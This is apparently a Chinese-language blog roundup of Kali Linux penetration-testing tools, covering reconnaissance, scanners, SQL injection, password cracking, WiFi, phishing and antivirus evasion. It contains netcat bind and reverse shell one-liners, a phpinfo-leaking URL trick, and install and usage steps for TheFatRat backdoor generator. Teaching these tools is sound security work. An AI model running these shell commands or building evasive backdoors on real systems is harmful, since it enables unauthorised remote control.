信息收集

Maltego

Maltego社會工程學信息收集工具。作為一款成功的信息收集工具其功能強大，它不僅可以自動收集到所需信息，而且可以將收集的信息可視化，用一種圖像化的方式將結果呈現給我們。

參考：http://www.360doc.com/content/18/0725/01/11935121_772997434.shtml

https://www.freebuf.com/sectool/187831.html

Netdiscover

Netdiscover是一個主動/被動的ARP偵查工具。該工具在不使用DHCP的無線網絡上非常有用。使用Netdiscover工具可以在網絡上掃描IP地址。

參考：https://blog.csdn.net/daxueba/article/details/42706131

DMitry

是一個一體化的信息收集工具。根據IP（或域名）來查詢目標主機的Whois信息
在Netcraft.com的網站上挖掘主機信息
查找目標域中用的子域
查找目標域的電子郵件地址
探測目標主機上打開的端口、被屏蔽的端口和關閉的端口

參考：https://blog.csdn.net/tianjin_ren/article/details/91178090

ike-scan

現在的VPN網絡都是基于IPsec技術搭建的。這類VPN默認使用UDP協議，端口為500。由于不監聽TCP端口，所以無法被TCP掃描發現。同時，它不會發送ICMP無法抵達包，所以也不會被UDP端口掃描所發現。由于IPsec規定，服務不會對錯誤格式包響應，所以即使使用UDP協議，向端口500發送垃圾數據，也不會探測到VPN服務。
要想判斷VPN服務，必須遵循IPsec技術規范，發送正確格式的包，才能嗅探服務器是否存在VPN服務。Kali Linux提供了ike-scan工具。該工具功能強大，不僅支持IPsec VPN的兩種工作連接模式，進行指紋識別，還可以偽造各種不規范包，以獲取更多的信息。

參考：https://blog.csdn.net/tianjin_ren/article/details/91188222

https://www.jianshu.com/p/f6149a72f8a7?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

unix-privesc-check

Kali Linux自帶的一款提權漏洞檢測工具。它是一個Shell文件，可以檢測所在系統的錯誤配置，以發現可以用于提權的漏洞。該工具適用于安全審計、滲透測試和系統維護等場景。它可以檢測與權限相關的各類文件的讀寫權限，如認證相關文件、重要配置文件、交換區文件、cron job文件、設備文件、其他用戶的家目錄、正在執行的文件等等。如果發現可以利用的漏洞，就會給出提示warning。

unix-privesc-check并不會檢測所有提權漏洞的潛在情況。它只是快速進行檢測，并以簡潔的方式給出提權漏洞相關的建議，大大減少用戶在文件權限檢測方面的枯燥工作的量。

（1）將unix-privesc-check上傳到目標主機上，或者直接在本機上。

（2）執行以下命令，進行漏洞檢測。

unix-privesc-check standard

Commix 命令注入工具

命令注入（Command Injection）攻擊是針對Web應用的一種攻擊方式。很多Web應用會讀取用戶提交的數據，然后傳遞到系統Shell，執行特定的操作，如為用戶創建單獨的目錄或文件、搜索特定的文件。如果對用戶提交的數據缺少嚴格的驗證，就會造成命令注入漏洞。

Kali Linux提供針對該漏洞的專向工具Commix。該工具支持Results-Base和Blind兩類注入方式。它以命令行方式運行。它會自動攻擊漏洞，枚舉目標主機信息，并允許用戶上傳惡意文件，達到控制主機的目的。

參考：https://blog.csdn.net/freegotocpp/article/details/83273769

漏洞掃描器

nikto

一款功能強大的 Web 服務器掃描程序 —— 這使其成為最好的 Kali Linux 工具之一。 它會檢查存在潛在危險的文件/程序、過時的服務器版本等等。

nikto -h 10.10.10.146 -evasion 12345

參考：https://www.cnblogs.com/WYQ-grasslands/archive/2018/04/15/8850144.html

phpinfo：域名+?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 會爆出phpinfo信息

dotdotpwn

dotdotpwn -m http -O -s -h 10.10.10.146

只能80端口，沒改端口的參數，比較雞肋

參考：https://blog.csdn.net/SHIGUANGTUJING/article/details/88959824

Sparta（斯巴達）–信息收集掃描爆破集成

參考：https://www.jianshu.com/p/81be445b7c5d

Sparta是一個Nmap、Nikto、Hydra等工具的集合，利用各個工具的優秀功能，完成信息收集、掃描和爆破等一體化的工具流。圖形界面，kali自帶，主機掃描。

WPScan（針對WordPress ）

WordPress 是最好的開源 CMS之一，而這個工具是最好的免費 WordpPress 安全審計工具。它是免費的，但不是開源的。如果你想知道一個 WordPress 博客是否在某種程度上容易受到攻擊，WPScan 就是你的朋友。此外，它還為你提供了所用的插件的詳細信息。當然，一個安全性很好的博客可能不會暴露給你很多細節，但它仍然是 WordPress 安全掃描找到潛在漏洞的最佳工具。

websploit

自動化滲透神器websploit

參考https://blog.csdn.net/m0_37438418/article/details/78979792

數據庫

hexorbase

HexorBase是一個數據庫應用。它是為從一個集中的位置同時管理和審計多個數據庫服務器而被設計出來的。它能夠執行SQL查詢和對常見的數據庫服務器暴力破解攻擊（MySQL和SQLite的，微軟SQL服務器，甲骨文和PostgreSQL）.HexorBase允許通過代理進行數據包路由甚至以Metasploit為核心進行路由從而去和隱藏在本地子網內的遠程服務器進行通信。
參考：https://blog.csdn.net/qq_29277155/article/details/51759555

sql注入

sqlmap

JSQL-自動化SQL注入神器

jSQL injection是一款由JAVA開法的SQL自動化注入工具，它提供了數據庫查詢、后臺爆破、文件讀取、Web shell、SQL Shell、文件上傳、暴力枚舉、編碼、批量注入測試等強大的功能，是一款非常不錯的工具，也是滲透測試人員的強大助手。它支持GET\POST注入，同時也可以進行HTTP頭注入（這個需要用戶自動構建）

參考：https://blog.csdn.net/Fly_hps/article/details/80614814

Skipfish

Skipfish 是一個 Web 應用掃描程序，可以為你提供幾乎所有類型的 Web 應用程序的洞察信息。它快速且易于使用。此外，它的遞歸爬取方法使它更好用。Skipfish 生成的報告可以用于專業的 Web 應用程序安全評估。

skipfish -o test http:1.1.1.1 #指定輸出目錄/路徑 輸出到test目錄

參考：https://blog.csdn.net/zixuanfy/article/details/52783889

端口掃描

nmap

netcat

netcat被稱作是網絡工具當中的瑞士軍刀,短小卻功能強大

參考：https://www.cnblogs.com/nul1/p/10992279.html

端口掃描：nc -nvz 192.168.1.105 1-65535

遠程控制

正向 A: nc -lp 端口 -c bash B: nc -nv A的IP 端口eg:A: nc -lp 3333 -c bash B: nc -nv 192.168.1.104 3333 反向 A: nc -lp 端口 B: nc -nv A的IP 端口 -c bashA: nc -lp 3333 B: nc -nv 192.168.1.104 3333 -c bash

-c是使用命令行,如果是Windows主機,需要把bash改成cmd

正向是A被控制,反向是B被控制

密碼破解

hydra

hydra在線破解工具，參考：https://www.cnblogs.com/ECJTUACM-873284962/p/7805116.html

John the Ripper

離線破解工具

John the Ripper是一個快速的密碼破解工具，用于在已知密文的情況下嘗試破解出明文，支持目前大多數的加密算法，如DES、MD4、MD5等。它支持多種不同類型的系統架構，包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS，主要目的是破解不夠牢固的Unix/Linux系統密碼。除了在各種Unix系統上最常見的幾種密碼哈希類型之外，它還支持Windows LM散列，以及社區增強版本中的許多其他哈希和密碼。它是一款開源軟件。Kali中自帶JohnLinux下的使用方法：

john –wordlist=passwd.dic shadow.txt

WIFI

參考：https://www.freebuf.com/sectool/137163.html

Aircrack-ng

Aircrack-ng 是評估 WiFi 網絡安全性的工具集合。它不僅限于監控和獲取信息 —— 還包括破壞網絡（WEP、WPA 1 和 WPA 2）的能力。

如果你忘記了自己的 WiFi 網絡的密碼，可以嘗試使用它來重新獲得訪問權限。它還包括各種無線攻擊能力，你可以使用它們來定位和監控 WiFi 網絡以增強其安全性。

XSS

BeEF

BeEF（瀏覽器利用框架Browser Exploitation Framework）是另一個令人印象深刻的工具。它專為滲透測試人員量身定制，用于評估 Web 瀏覽器的安全性。

這是最好的 Kali Linux 工具之一，因為很多用戶在談論 Web 安全時希望了解并修復客戶端的問題。

逆向

Apktool

Apktool 確實是 Kali Linux 上用于逆向工程 Android 應用程序的流行工具之一

數字取證

Autopsy Forensic Browser

Autopsy 是一個數字取證工具，用于調查計算機上發生的事情。那么，你也可以使用它從 SD 卡恢復圖像。它也被執法官員使用。你可以閱讀文檔來探索可以用它做什么。你還應該查看他們的 GitHub 頁面。

釣魚

King Phisher

網絡釣魚攻擊現在非常普遍。King Phisher 工具可以通過模擬真實的網絡釣魚攻擊來幫助測試和提升用戶意識。出于顯而易見的原因，在模擬一個組織的服務器內容前，你需要獲得許可。

免殺

TheFatRat

參考：https://www.cnblogs.com/dr228912353/p/9170443.html

一、安裝方法

git clone https://github.com/Screetsec/TheFatRat.git

cd Fatrat

apt-get update

apt-get install mingw32 backdoor-factory

echo ‘deb http://http.kali.org/kali sana main non-free contrib’ >> /etc/apt/sources.list

apt-get update

apt-get install mingw32

安裝完之后，我們要給下面2個文件賦予下權限。

? chmod +x fatrat

chmod +x powerfull.sh

./fatrat

二、使用方法

下面是主界面的功能截圖，順便說下軟件的logo太個性了。作者一定很喜歡老鼠。

建議大家使用第二個生成后門的模塊，這個缺點就是生成后門的速度真的跟蝸牛一樣，但是免殺效果是最好的。

總結

以上是生活随笔為你收集整理的kali工具整理的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。